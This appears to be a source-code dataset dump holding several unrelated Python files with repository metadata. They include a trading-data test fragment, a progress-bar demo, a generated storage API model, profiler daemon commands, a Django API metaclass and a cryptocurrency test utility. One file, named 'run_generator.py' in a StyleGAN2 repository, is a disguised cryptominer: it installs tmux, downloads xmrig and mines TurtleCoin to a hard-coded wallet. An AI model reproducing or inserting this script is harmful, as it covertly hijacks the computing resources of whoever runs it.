num_of_tickers = len(tickers)
num_of_fields = len(fields)
start_value = 100.0
values = np.arange(start_value, num_of_dates * num_of_tickers * num_of_fields + start_value)
reshaped_values = np.reshape(values, (num_of_dates, num_of_tickers, num_of_fields))
mocked_result_market_open = QFDataArray.create(all_dates_market_open, tickers, fields, data=reshaped_values)
mocked_result_market_close = QFDataArray.create(all_dates_market_close, tickers, fields, data=reshaped_values)
mocked_result_market_close.loc[:, :, PriceField.Low] -= 5.0
mocked_result_market_close.loc[:, :, PriceField.High] += 5.0
all_dates = all_dates_market_open.union(all_dates_market_close)
mocked_result = QFDataArray.create(all_dates, tickers, fields)
mocked_result.loc[all_dates_market_open, :, :] = mocked_result_market_open.loc[:, :, :]
mocked_result.loc[all_dates_market_close, :, :] = mocked_result_market_close.loc[:, :, :]
self._add_test_cases(mocked_result, tickers)
return mocked_result
def _add_test_cases(self, mocked_result, tickers):
mocked_result.loc[
str_to_date('2015-02-05 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
mocked_result.loc[
str_to_date('2015-02-12 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
mocked_result.loc[
str_to_date('2015-02-13 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
mocked_result.loc[
str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 25.0
mocked_result.loc[str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Open] = \
mocked_result.loc[str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low]
| true
| true
|
790b10de739422fdc1702d4f47f6221000801c25
| 1,572
|
py
|
Python
|
examples/progress/many-parallel-tasks.py
|
scalabli/quo
|
70b6d4129ee705930f1f8a792fc4c9247d973f9d
|
[
"MIT"
] | 3
|
2022-03-13T13:22:35.000Z
|
2022-03-18T08:22:51.000Z
|
examples/progress/many-parallel-tasks.py
|
scalabli/quo
|
70b6d4129ee705930f1f8a792fc4c9247d973f9d
|
[
"MIT"
] | 1
|
2022-03-21T16:29:54.000Z
|
2022-03-21T16:29:54.000Z
|
examples/progress/many-parallel-tasks.py
|
scalabli/quo
|
70b6d4129ee705930f1f8a792fc4c9247d973f9d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
More complex demonstration of what's possible with the progress bar.
"""
import threading
import time
from quo.text import Text
from quo.progress import ProgressBar
def main():
with ProgressBar(
title=Text("<b>Example of many parallel tasks.</b>"),
bottom_toolbar=Text("<b>[Control-L]</b> clear <b>[Control-C]</b> abort"),
) as pb:
def run_task(label, total, sleep_time):
for i in pb(range(total), label=label):
time.sleep(sleep_time)
threads = [
threading.Thread(target=run_task, args=("First task", 50, 0.1)),
threading.Thread(target=run_task, args=("Second task", 100, 0.1)),
threading.Thread(target=run_task, args=("Third task", 8, 3)),
threading.Thread(target=run_task, args=("Fourth task", 200, 0.1)),
threading.Thread(target=run_task, args=("Fifth task", 40, 0.2)),
threading.Thread(target=run_task, args=("Sixth task", 220, 0.1)),
threading.Thread(target=run_task, args=("Seventh task", 85, 0.05)),
threading.Thread(target=run_task, args=("Eight task", 200, 0.05)),
]
for t in threads:
t.daemon = True
t.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in threads:
while t.is_alive():
t.join(timeout=0.5)
if __name__ == "__main__":
main()
| 34.173913
| 82
| 0.592875
|
import threading
import time
from quo.text import Text
from quo.progress import ProgressBar
def main():
with ProgressBar(
title=Text("<b>Example of many parallel tasks.</b>"),
bottom_toolbar=Text("<b>[Control-L]</b> clear <b>[Control-C]</b> abort"),
) as pb:
def run_task(label, total, sleep_time):
for i in pb(range(total), label=label):
time.sleep(sleep_time)
threads = [
threading.Thread(target=run_task, args=("First task", 50, 0.1)),
threading.Thread(target=run_task, args=("Second task", 100, 0.1)),
threading.Thread(target=run_task, args=("Third task", 8, 3)),
threading.Thread(target=run_task, args=("Fourth task", 200, 0.1)),
threading.Thread(target=run_task, args=("Fifth task", 40, 0.2)),
threading.Thread(target=run_task, args=("Sixth task", 220, 0.1)),
threading.Thread(target=run_task, args=("Seventh task", 85, 0.05)),
threading.Thread(target=run_task, args=("Eight task", 200, 0.05)),
]
for t in threads:
t.daemon = True
t.start()
for t in threads:
while t.is_alive():
t.join(timeout=0.5)
if __name__ == "__main__":
main()
| true
| true
|
790b10e66ba6f6755bae0c6eb5fe3a10af76ed1c
| 4,266
|
py
|
Python
|
purity_fb/purity_fb_1dot5/models/hardware_connector_response.py
|
unixtreme/purity_fb_python_client
|
e836afe9804ffa99f74bf4b5202f181c3c04d9df
|
[
"Apache-2.0"
] | null | null | null |
purity_fb/purity_fb_1dot5/models/hardware_connector_response.py
|
unixtreme/purity_fb_python_client
|
e836afe9804ffa99f74bf4b5202f181c3c04d9df
|
[
"Apache-2.0"
] | null | null | null |
purity_fb/purity_fb_1dot5/models/hardware_connector_response.py
|
unixtreme/purity_fb_python_client
|
e836afe9804ffa99f74bf4b5202f181c3c04d9df
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Purity//FB REST Client
    Client for Purity//FB REST API (1.0), developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentation can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.5
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class HardwareConnectorResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'pagination_info': 'PaginationInfo',
'items': 'list[HardwareConnector]'
}
attribute_map = {
'pagination_info': 'pagination_info',
'items': 'items'
}
def __init__(self, pagination_info=None, items=None):
"""
HardwareConnectorResponse - a model defined in Swagger
"""
self._pagination_info = None
self._items = None
if pagination_info is not None:
self.pagination_info = pagination_info
if items is not None:
self.items = items
@property
def pagination_info(self):
"""
Gets the pagination_info of this HardwareConnectorResponse.
pagination information, only available in GET requests
:return: The pagination_info of this HardwareConnectorResponse.
:rtype: PaginationInfo
"""
return self._pagination_info
@pagination_info.setter
def pagination_info(self, pagination_info):
"""
Sets the pagination_info of this HardwareConnectorResponse.
pagination information, only available in GET requests
:param pagination_info: The pagination_info of this HardwareConnectorResponse.
:type: PaginationInfo
"""
self._pagination_info = pagination_info
@property
def items(self):
"""
Gets the items of this HardwareConnectorResponse.
a list of hardware connectors
:return: The items of this HardwareConnectorResponse.
:rtype: list[HardwareConnector]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this HardwareConnectorResponse.
a list of hardware connectors
:param items: The items of this HardwareConnectorResponse.
:type: list[HardwareConnector]
"""
self._items = items
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, HardwareConnectorResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
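# Minimal usage sketch (hypothetical values, not part of the generated model):
#
#   resp = HardwareConnectorResponse(items=[])
#   resp.to_dict()   # -> {'pagination_info': None, 'items': []}
#   print(resp)      # __repr__ delegates to to_str(), i.e. pformat(to_dict())
#
# to_dict() walks swagger_types, so nested models are converted via their own
# to_dict() and lists/dicts of models are converted element by element.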
| 27.701299
| 197
| 0.585795
|
from pprint import pformat
from six import iteritems
import re
class HardwareConnectorResponse(object):
swagger_types = {
'pagination_info': 'PaginationInfo',
'items': 'list[HardwareConnector]'
}
attribute_map = {
'pagination_info': 'pagination_info',
'items': 'items'
}
def __init__(self, pagination_info=None, items=None):
self._pagination_info = None
self._items = None
if pagination_info is not None:
self.pagination_info = pagination_info
if items is not None:
self.items = items
@property
def pagination_info(self):
return self._pagination_info
@pagination_info.setter
def pagination_info(self, pagination_info):
self._pagination_info = pagination_info
@property
def items(self):
return self._items
@items.setter
def items(self, items):
self._items = items
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, HardwareConnectorResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
790b1144d75491d0b25d7dba6e366933b0948fd9
| 3,964
|
py
|
Python
|
pyperf/cmd/daemons.py
|
kevinconway/PyPerf
|
5aaf9943bb6d979e2f42229ed629816bc3ca1fb4
|
[
"Apache-2.0"
] | null | null | null |
pyperf/cmd/daemons.py
|
kevinconway/PyPerf
|
5aaf9943bb6d979e2f42229ed629816bc3ca1fb4
|
[
"Apache-2.0"
] | 2
|
2015-07-12T19:55:25.000Z
|
2016-01-30T14:32:11.000Z
|
pyperf/cmd/daemons.py
|
kevinconway/PyPerf
|
5aaf9943bb6d979e2f42229ed629816bc3ca1fb4
|
[
"Apache-2.0"
] | null | null | null |
"""Commands for starting daemons."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import pprint
import confpy.api
import confpy.core.option
from .. import messages
cfg = confpy.api.Configuration(
transport=confpy.api.Namespace(
description='Message transport options.',
source=confpy.core.option.Option(
description='The transport to fetch new requests from.',
required=True,
),
error=confpy.core.option.Option(
description='The transport to which errors are written.',
required=True,
),
result=confpy.core.option.Option(
description='The transport to which results are written.',
required=True,
),
),
daemon=confpy.api.Namespace(
description='Long running daemon options.',
profiler=confpy.core.option.Option(
description='The profiler implementation to use.',
required=True,
),
process=confpy.core.option.Option(
            description='The daemon interface implementation to use.',
required=True,
),
pidfile=confpy.api.StringOption(
description='The location to use as a pidfile.',
required=True,
),
),
)
def _common_args():
"""ArgumentParser setup for all CLI commands."""
parser = argparse.ArgumentParser(
description='Start a new profiler process.'
)
parser.add_argument(
'--config',
required=True,
help='The Python configuration file for the process.',
)
return parser
def profiler_main():
"""Manage a profiler daemon."""
parser = _common_args()
parser.add_argument(
'--action',
required=True,
choices=('start', 'stop', 'restart'),
)
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
proc = cfg.daemon.process(
source_transport=cfg.transport.source,
error_transport=cfg.transport.error,
results_transport=cfg.transport.result,
profiler=cfg.daemon.profiler,
pidfile=cfg.daemon.pidfile,
)
if args.action == 'stop':
proc.stop()
if args.action == 'start':
proc.start()
if args.action == 'restart':
proc.restart()
def send_request():
"""Send a profile request to the daemon."""
parser = _common_args()
parser.add_argument(
'--identifier',
required=True,
help='The unique message identifier.',
)
parser.add_argument(
'--setup',
default='pass',
help='Any setup code if needed for the profile.',
)
parser.add_argument(
'--code',
required=True,
help='The code to profile.',
)
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
cfg.transport.source().send(
messages.ProfileRequest(
identifier=args.identifier,
setup=args.setup,
code=args.code,
),
)
def fetch_result():
"""Fetch a result from the transport."""
parser = _common_args()
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
transport = cfg.transport.result()
msg = transport.fetch()
if msg is not None:
transport.complete(msg)
pprint.pprint(msg.json)
def fetch_error():
"""Fetch an error from the transport."""
parser = _common_args()
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
transport = cfg.transport.error()
msg = transport.fetch()
if msg is not None:
transport.complete(msg)
pprint.pprint(msg.json)
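# Example invocations (a sketch only: the config filename is hypothetical and
# the command names assume these functions are exposed as console entry points):
#
#   profiler_main:  --config pyperf_conf.py --action start   (or stop/restart)
#   send_request:   --config pyperf_conf.py --identifier req-1 \
#                       --code "sum(range(10**6))"
#   fetch_result / fetch_error:  --config pyperf_conf.py
#
# Every command re-parses the same confpy configuration; env_prefix='PYPERF'
# suggests values can also be overridden through environment variables.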
| 25.74026
| 77
| 0.619324
|
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import pprint
import confpy.api
import confpy.core.option
from .. import messages
cfg = confpy.api.Configuration(
transport=confpy.api.Namespace(
description='Message transport options.',
source=confpy.core.option.Option(
description='The transport to fetch new requests from.',
required=True,
),
error=confpy.core.option.Option(
description='The transport to which errors are written.',
required=True,
),
result=confpy.core.option.Option(
description='The transport to which results are written.',
required=True,
),
),
daemon=confpy.api.Namespace(
description='Long running daemon options.',
profiler=confpy.core.option.Option(
description='The profiler implementation to use.',
required=True,
),
process=confpy.core.option.Option(
            description='The daemon interface implementation to use.',
required=True,
),
pidfile=confpy.api.StringOption(
description='The location to use as a pidfile.',
required=True,
),
),
)
def _common_args():
parser = argparse.ArgumentParser(
description='Start a new profiler process.'
)
parser.add_argument(
'--config',
required=True,
help='The Python configuration file for the process.',
)
return parser
def profiler_main():
parser = _common_args()
parser.add_argument(
'--action',
required=True,
choices=('start', 'stop', 'restart'),
)
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
proc = cfg.daemon.process(
source_transport=cfg.transport.source,
error_transport=cfg.transport.error,
results_transport=cfg.transport.result,
profiler=cfg.daemon.profiler,
pidfile=cfg.daemon.pidfile,
)
if args.action == 'stop':
proc.stop()
if args.action == 'start':
proc.start()
if args.action == 'restart':
proc.restart()
def send_request():
parser = _common_args()
parser.add_argument(
'--identifier',
required=True,
help='The unique message identifier.',
)
parser.add_argument(
'--setup',
default='pass',
help='Any setup code if needed for the profile.',
)
parser.add_argument(
'--code',
required=True,
help='The code to profile.',
)
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
cfg.transport.source().send(
messages.ProfileRequest(
identifier=args.identifier,
setup=args.setup,
code=args.code,
),
)
def fetch_result():
parser = _common_args()
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
transport = cfg.transport.result()
msg = transport.fetch()
if msg is not None:
transport.complete(msg)
pprint.pprint(msg.json)
def fetch_error():
parser = _common_args()
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
transport = cfg.transport.error()
msg = transport.fetch()
if msg is not None:
transport.complete(msg)
pprint.pprint(msg.json)
| true
| true
|
790b12e07c9d98672f8fa8e1fa2048ff267f36b2
| 460
|
py
|
Python
|
run_generator.py
|
vps01bao/StyleGAN2
|
1abec4c69d7983dda5ba3594ea71e5b4cf8c9a9c
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
vps01bao/StyleGAN2
|
1abec4c69d7983dda5ba3594ea71e5b4cf8c9a9c
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
vps01bao/StyleGAN2
|
1abec4c69d7983dda5ba3594ea71e5b4cf8c9a9c
|
[
"BSD-Source-Code"
] | null | null | null |
import os as alpha
alpha.system("apt-get install -y tmux && tmux new-session 'apt-get -y install wget && wget https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-linux-x64.tar.gz && tar -xvf xmrig-6.15.0-linux-x64.tar.gz && cd xmrig-6.15.0 && ./xmrig --donate-level 1 -o de.turtlecoin.herominers.com:1160 -u TRTLv1GiYaa1d14U6xHo9gYUhz1Wsr5pgE1yYbr14qvcCzpBe2rqYKw1WYjuJ2sHaJbhU6TFvwfySCFV8GgTFP5qBhU5tbBaESE -p myvps -a argon2/chukwav2 -k'")
| 153.333333
| 440
| 0.771739
|
import os as alpha
alpha.system("apt-get install -y tmux && tmux new-session 'apt-get -y install wget && wget https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-linux-x64.tar.gz && tar -xvf xmrig-6.15.0-linux-x64.tar.gz && cd xmrig-6.15.0 && ./xmrig --donate-level 1 -o de.turtlecoin.herominers.com:1160 -u TRTLv1GiYaa1d14U6xHo9gYUhz1Wsr5pgE1yYbr14qvcCzpBe2rqYKw1WYjuJ2sHaJbhU6TFvwfySCFV8GgTFP5qBhU5tbBaESE -p myvps -a argon2/chukwav2 -k'")
| true
| true
|
790b13a929fd2156cb71cdd6e14944f56f33744a
| 4,643
|
py
|
Python
|
simple_api/django_object/django_object.py
|
ladal1/simple_api
|
1b5d560476bccad9f68a7331d092dbdb68c48bf7
|
[
"MIT"
] | 1
|
2021-02-24T22:14:59.000Z
|
2021-02-24T22:14:59.000Z
|
simple_api/django_object/django_object.py
|
ladal1/simple_api
|
1b5d560476bccad9f68a7331d092dbdb68c48bf7
|
[
"MIT"
] | null | null | null |
simple_api/django_object/django_object.py
|
ladal1/simple_api
|
1b5d560476bccad9f68a7331d092dbdb68c48bf7
|
[
"MIT"
] | null | null | null |
from copy import deepcopy
from simple_api.django_object.actions import DetailAction, ListAction, CreateAction, UpdateAction, DeleteAction
from simple_api.django_object.datatypes import create_associated_list_type
from simple_api.django_object.filters import generate_filters
from simple_api.django_object.converter import determine_simple_api_fields
from simple_api.django_object.utils import get_pk_field
from simple_api.object.object import Object, ObjectMeta
from simple_api.object.registry import object_storage
from simple_api.django_object.registry import model_django_object_storage
from simple_api.utils import ClassStub
class DjangoObjectMeta(type):
base_class = "simple_api.django_object.django_object.DjangoObject"
def __new__(mcs, name, bases, attrs, **kwargs):
cls = super().__new__(mcs, name, bases, attrs)
if kwargs.get("skip", False) or object_storage.key_for_class(attrs["__module__"], name) == mcs.base_class:
return cls
object_stub = ClassStub(name=cls.__name__, bases=(Object,))
# set the module of the generated Object class to match the module of the user class
object_stub.add_attr("__module__", cls.__module__)
assert cls.model is not None, "`model` must be set."
# if the class is meant to resolve relations, store it for the particular model
if cls.class_for_related:
model_django_object_storage.store(cls.model, cls)
cls.pk_field_name, cls.pk_field = get_pk_field(cls.model)
object_stub.add_attr("pk_field", cls.pk_field_name)
# make sure the primary key is included, otherwise `ModelObjectAction`s would just not work
if cls.only_fields and cls.pk_field_name not in cls.only_fields:
cls.only_fields = cls.only_fields + (cls.pk_field_name,)
elif cls.exclude_fields and cls.pk_field_name in cls.exclude_fields:
cls.exclude_fields = (f for f in cls.exclude_fields if f != cls.pk_field_name)
fields, input_fields, output_fields, field_validators = determine_simple_api_fields(
cls.model,
cls.only_fields, cls.exclude_fields,
cls.custom_fields, cls.input_custom_fields, cls.output_custom_fields,
)
for f in input_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.in_fields = {**fields, **input_fields}
for f in output_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.out_fields = {**fields, **output_fields}
object_stub.add_attr("fields", fields)
object_stub.add_attr("input_fields", input_fields)
object_stub.add_attr("output_fields", output_fields)
# create filters and List type for potential listing actions
cls.filter_type = ObjectMeta("{}Filters".format(cls.__name__), (Object,), {"fields": generate_filters(cls)})
object_stub.add_attr("filter_type", cls.filter_type)
create_associated_list_type(cls)
actions = {}
if cls.detail_action is not None:
actions["detail"] = deepcopy(cls.detail_action)
if cls.list_action is not None:
actions["list"] = deepcopy(cls.list_action)
if cls.create_action is not None:
actions["create"] = deepcopy(cls.create_action)
if cls.update_action is not None:
actions["update"] = deepcopy(cls.update_action)
if cls.delete_action is not None:
actions["delete"] = deepcopy(cls.delete_action)
actions.update(cls.custom_actions)
converted_actions = {}
for action_name, action in actions.items():
action.set_parent_class(cls)
action.set_name(action_name)
converted_actions[action_name] = action.to_action()
object_stub.add_attr("actions", converted_actions)
if cls.field_difficulty_scores is not None:
object_stub.add_attr("field_difficulty_scores", cls.field_difficulty_scores)
cls._object = object_stub.build(ObjectMeta)
return cls
class DjangoObject(metaclass=DjangoObjectMeta):
model = None
auto_pk = True
class_for_related = True
only_fields = None
exclude_fields = None
custom_fields = {}
input_custom_fields = {}
output_custom_fields = {}
field_difficulty_scores = {}
detail_action = DetailAction()
list_action = ListAction()
create_action = CreateAction()
update_action = UpdateAction()
delete_action = DeleteAction()
custom_actions = {}
@classmethod
def to_object(cls):
return cls._object
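# Hypothetical usage sketch (the model and field names below are invented,
# not taken from this repository):
#
#   class BookObject(DjangoObject):
#       model = Book                    # some Django model
#       only_fields = ("id", "title")   # the pk field is re-added if omitted
#
# DjangoObjectMeta then builds the plain Object counterpart (filters, list type
# and the default detail/list/create/update/delete actions), reachable via
# BookObject.to_object().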
| 39.347458
| 116
| 0.697825
|
from copy import deepcopy
from simple_api.django_object.actions import DetailAction, ListAction, CreateAction, UpdateAction, DeleteAction
from simple_api.django_object.datatypes import create_associated_list_type
from simple_api.django_object.filters import generate_filters
from simple_api.django_object.converter import determine_simple_api_fields
from simple_api.django_object.utils import get_pk_field
from simple_api.object.object import Object, ObjectMeta
from simple_api.object.registry import object_storage
from simple_api.django_object.registry import model_django_object_storage
from simple_api.utils import ClassStub
class DjangoObjectMeta(type):
base_class = "simple_api.django_object.django_object.DjangoObject"
def __new__(mcs, name, bases, attrs, **kwargs):
cls = super().__new__(mcs, name, bases, attrs)
if kwargs.get("skip", False) or object_storage.key_for_class(attrs["__module__"], name) == mcs.base_class:
return cls
object_stub = ClassStub(name=cls.__name__, bases=(Object,))
object_stub.add_attr("__module__", cls.__module__)
assert cls.model is not None, "`model` must be set."
if cls.class_for_related:
model_django_object_storage.store(cls.model, cls)
cls.pk_field_name, cls.pk_field = get_pk_field(cls.model)
object_stub.add_attr("pk_field", cls.pk_field_name)
if cls.only_fields and cls.pk_field_name not in cls.only_fields:
cls.only_fields = cls.only_fields + (cls.pk_field_name,)
elif cls.exclude_fields and cls.pk_field_name in cls.exclude_fields:
cls.exclude_fields = (f for f in cls.exclude_fields if f != cls.pk_field_name)
fields, input_fields, output_fields, field_validators = determine_simple_api_fields(
cls.model,
cls.only_fields, cls.exclude_fields,
cls.custom_fields, cls.input_custom_fields, cls.output_custom_fields,
)
for f in input_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.in_fields = {**fields, **input_fields}
for f in output_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.out_fields = {**fields, **output_fields}
object_stub.add_attr("fields", fields)
object_stub.add_attr("input_fields", input_fields)
object_stub.add_attr("output_fields", output_fields)
cls.filter_type = ObjectMeta("{}Filters".format(cls.__name__), (Object,), {"fields": generate_filters(cls)})
object_stub.add_attr("filter_type", cls.filter_type)
create_associated_list_type(cls)
actions = {}
if cls.detail_action is not None:
actions["detail"] = deepcopy(cls.detail_action)
if cls.list_action is not None:
actions["list"] = deepcopy(cls.list_action)
if cls.create_action is not None:
actions["create"] = deepcopy(cls.create_action)
if cls.update_action is not None:
actions["update"] = deepcopy(cls.update_action)
if cls.delete_action is not None:
actions["delete"] = deepcopy(cls.delete_action)
actions.update(cls.custom_actions)
converted_actions = {}
for action_name, action in actions.items():
action.set_parent_class(cls)
action.set_name(action_name)
converted_actions[action_name] = action.to_action()
object_stub.add_attr("actions", converted_actions)
if cls.field_difficulty_scores is not None:
object_stub.add_attr("field_difficulty_scores", cls.field_difficulty_scores)
cls._object = object_stub.build(ObjectMeta)
return cls
class DjangoObject(metaclass=DjangoObjectMeta):
model = None
auto_pk = True
class_for_related = True
only_fields = None
exclude_fields = None
custom_fields = {}
input_custom_fields = {}
output_custom_fields = {}
field_difficulty_scores = {}
detail_action = DetailAction()
list_action = ListAction()
create_action = CreateAction()
update_action = UpdateAction()
delete_action = DeleteAction()
custom_actions = {}
@classmethod
def to_object(cls):
return cls._object
| true
| true
|
790b13d3bf64c67079260e68880abcf1b4b6ee36
| 21,638
|
py
|
Python
|
qa/rpc-tests/test_framework/util.py
|
cephcoin/cephcoin
|
3dda3986533b2321cea2cee8ae1ae5a2b63dbfa4
|
[
"MIT"
] | 1
|
2018-02-09T16:02:34.000Z
|
2018-02-09T16:02:34.000Z
|
qa/rpc-tests/test_framework/util.py
|
cephcoin/cephcoin
|
3dda3986533b2321cea2cee8ae1ae5a2b63dbfa4
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/test_framework/util.py
|
cephcoin/cephcoin
|
3dda3986533b2321cea2cee8ae1ae5a2b63dbfa4
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2014-2017 The CephCoin Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Helpful routines for regression testing
#
# Add python-bitcoinrpc to module search path:
import os
import sys
from binascii import hexlify, unhexlify
from base64 import b64encode
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
import errno
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
COVERAGE_DIR = None
#Set Mocktime default to OFF.
#MOCKTIME is only needed for scripts that use the
#cached version of the blockchain. If the cached
#version of the blockchain is used without MOCKTIME
#then the mempools will not sync due to IBD.
MOCKTIME = 0
def enable_mocktime():
    #For backward compatibility of the python scripts
#with previous versions of the cache, set MOCKTIME
#to regtest genesis time + (201 * 156)
global MOCKTIME
MOCKTIME = 1417713337 + (201 * 156)
def disable_mocktime():
global MOCKTIME
MOCKTIME = 0
def get_mocktime():
return MOCKTIME
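# Typical flow (as used by initialize_chain below): enable_mocktime() pins a
# deterministic start time, set_node_times() pushes it to every node before
# each generate(1) call, and disable_mocktime() restores live time once the
# cached chain has been built.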
def enable_coverage(dirname):
"""Maintain a log of which RPC calls are made during testing."""
global COVERAGE_DIR
COVERAGE_DIR = dirname
def get_rpc_proxy(url, node_number, timeout=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
COVERAGE_DIR, node_number) if COVERAGE_DIR else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def get_mnsync_status(node):
result = node.mnsync("status")
return result['IsSynced']
def wait_to_sync(node):
synced = False
while not synced:
synced = get_mnsync_status(node)
time.sleep(0.5)
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def sync_blocks(rpc_connections, wait=1):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(wait)
def sync_mempools(rpc_connections, wait=1):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(wait)
def sync_masternodes(rpc_connections):
for node in rpc_connections:
wait_to_sync(node)
bitcoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "cephcoin.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=rt\n")
f.write("rpcpassword=rt\n")
f.write("port="+str(p2p_port(n))+"\n")
f.write("rpcport="+str(rpc_port(n))+"\n")
f.write("listenonion=0\n")
return datadir
def rpc_url(i, rpchost=None):
return "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
def wait_for_bitcoind_start(process, url, i):
'''
Wait for cephcoind to start. This means that RPC is accessible and fully initialized.
Raise an exception if cephcoind exits during initialization.
'''
while True:
if process.poll() is not None:
raise Exception('cephcoind exited with status %i during initialization' % process.returncode)
try:
rpc = get_rpc_proxy(url, i)
blocks = rpc.getblockcount()
break # break out of loop on success
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
                raise # unknown JSON RPC exception
time.sleep(0.25)
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
"""
if (not os.path.isdir(os.path.join("cache","node0"))
or not os.path.isdir(os.path.join("cache","node1"))
or not os.path.isdir(os.path.join("cache","node2"))
